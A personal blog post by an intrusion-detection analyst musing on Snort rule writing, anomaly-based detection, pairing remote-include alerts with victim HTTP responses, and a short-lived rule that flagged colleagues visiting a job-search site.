Ayoi's

Suddenly it popped up in my mind. Why? When our researcher asked me to help him in gathering all available attack packets or traffics for him. I told him, instead of we trying to identify/categorizing/accumulating/storing all the attacks traffics in order to understand the attacks pattern, why not we identify the normal traffics for the monitored segments and any significant deviation from this normal traffics can be considered suspicious. Even the main rule of writing snort rules is always capture the vulnerability and not the attack tools. The reason? There are thousands of attack pattern for a vulnerability. We can never fully record all the attack methods. It’s quite impossible IMHO. And of cause there is no way we can identify any 0-dayz attacks if we concentrating on enumerating attacks instead of concentrating on the normal traffics.

One of the ICT Security DUMB ideas in motion I guess..

Yeah, it”s fun to write Job street rules but from time to time I just evaluate the existing rules to identify which ones suitable for our usage. Ahh and I did find that default Web PHP remote include path rule will not be triggered when the html equivalent was used instead of http (one of the content that will trigger the rule). Of cause the targeted server will giving 200 response code when that type of attack used. Anyway further POC needed tho as it’s not finalized yet.

Anyway one of our developers asked me whether attack-response rules can be used in order to record victim response to attacks. I did suggest that in order to at least eliminate the amount of unsuccessful attacks on our client’s assets, what we can do is to compare the alerts (attacks) with the response from the victim which can be derived from their log files. Such as if remote file inclusion attempted on a webserver, comparison can be made with the response from the victim via their logfiles. Perhaps it shud be not an easy task to perform these but for 200 related response from the victim on any attacks can be a good indicators that the command/attempt by the attackers is processed by the victim. While any 400 related response will indicates that the attacks are failed and will not shown in SA console (or have some sort of messages saying that the attempt failed – for statistic sake)

To answer my developer question, I just implement the dynamic rules. For a test I just do some modification on Web PHP remote include path rule and create one dynamic rule to indicate 200 response. I do believe this is not a viable option as we have to modify all the rules to have this kind of attack and response alerts.

Anyway here’s the screenshot just for the sake of POC and I did state in my email to him about my thoughts on implementing this method.

Anyway from snort manual, it seems that this dynamic rules will be phased out and replaced with flowbits and tagging.

I think I do share the same feeling with Garfield about Monday. Even though there are paperworks, training slides and of cause some write ups that need my undivided attention, it’s kinda hard to kick start those works ;P (garfield pic taken from brokencode.biz)

Anyway during lunch hours, I had some discussion about our jobs, the company, our market value etc with my colleague who this Friday will be his last working day here. And when talking about new or potential new employer, the word jobstreet is the most said word in that discussion. I have to admit that I do have an account at jobstreet (eventually I’ve forgotten the login and password as far as I remember, I registered at that website nearly 7-8 years ago.) That’s why when somebody called me and said that they got my contact number from jobstreet, I do feel lil bit suspicious

I do wonder how many ppl from my company access that website. My colleague suggest to write snort rules to detect that particular activity. It’s for our own usage. Not for reporting to mgmt or anything like that. Anyway we just implement that rule to our external sensor and of cause that rules removed after one day.

(~DISCLAIMER~ I do not condone/promote/agree on breaching users privacy)

So below are the screenshots from my sguil. I’ve tested the rules on my machines. So both of the IPs shown are belong to my machines.

New Job Seekers Detected – jobstreet.com.my

New Job Seekers Detected – myjobstreet accessed

p/s: I will not publish the rules btw. I know it’s easy to write that rules but you have to work it out yourselves as I know that there are companies who are prohibiting their employee to surf that kind of sites.